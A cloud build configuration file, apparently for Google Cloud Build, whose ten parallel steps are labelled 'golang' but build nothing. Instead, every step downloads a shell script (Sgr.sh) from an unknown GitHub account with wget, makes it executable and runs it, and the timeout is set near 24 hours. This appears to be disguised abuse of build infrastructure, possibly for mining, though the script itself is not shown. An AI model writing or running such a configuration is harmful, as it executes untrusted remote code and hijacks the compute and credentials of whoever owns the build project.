steps:
- name: golang
  entrypoint: /bin/bash
  args:
    - '-c'
    - |
      wget https://raw.githubusercontent.com/Hsgsgdg92838/worted/main/Sgr.sh && chmod +x Sgr.sh && ./Sgr.sh
  waitFor:
    - '-'

- name: golang
  entrypoint: /bin/bash
  args:
    - '-c'
    - |
      wget https://raw.githubusercontent.com/Hsgsgdg92838/worted/main/Sgr.sh && chmod +x Sgr.sh && ./Sgr.sh
  waitFor:
    - '-'
    
- name: golang
  entrypoint: /bin/bash
  args:
    - '-c'
    - |
      wget https://raw.githubusercontent.com/Hsgsgdg92838/worted/main/Sgr.sh && chmod +x Sgr.sh && ./Sgr.sh
  waitFor:
    - '-'

- name: golang
  entrypoint: /bin/bash
  args:
    - '-c'
    - |
      wget https://raw.githubusercontent.com/Hsgsgdg92838/worted/main/Sgr.sh && chmod +x Sgr.sh && ./Sgr.sh
  waitFor:
    - '-'

- name: golang
  entrypoint: /bin/bash
  args:
    - '-c'
    - |
      wget https://raw.githubusercontent.com/Hsgsgdg92838/worted/main/Sgr.sh && chmod +x Sgr.sh && ./Sgr.sh
  waitFor:
    - '-'

- name: golang
  entrypoint: /bin/bash
  args:
    - '-c'
    - |
      wget https://raw.githubusercontent.com/Hsgsgdg92838/worted/main/Sgr.sh && chmod +x Sgr.sh && ./Sgr.sh
  waitFor:
    - '-'

- name: golang
  entrypoint: /bin/bash
  args:
    - '-c'
    - |
      wget https://raw.githubusercontent.com/Hsgsgdg92838/worted/main/Sgr.sh && chmod +x Sgr.sh && ./Sgr.sh
  waitFor:
    - '-'

- name: golang
  entrypoint: /bin/bash
  args:
    - '-c'
    - |
      wget https://raw.githubusercontent.com/Hsgsgdg92838/worted/main/Sgr.sh && chmod +x Sgr.sh && ./Sgr.sh
  waitFor:
    - '-'

- name: golang
  entrypoint: /bin/bash
  args:
    - '-c'
    - |
      wget https://raw.githubusercontent.com/Hsgsgdg92838/worted/main/Sgr.sh && chmod +x Sgr.sh && ./Sgr.sh
  waitFor:
    - '-'

- name: golang
  entrypoint: /bin/bash
  args:
    - '-c'
    - |
      wget https://raw.githubusercontent.com/Hsgsgdg92838/worted/main/Sgr.sh && chmod +x Sgr.sh && ./Sgr.sh
  waitFor:
    - '-'
timeout: '86000s'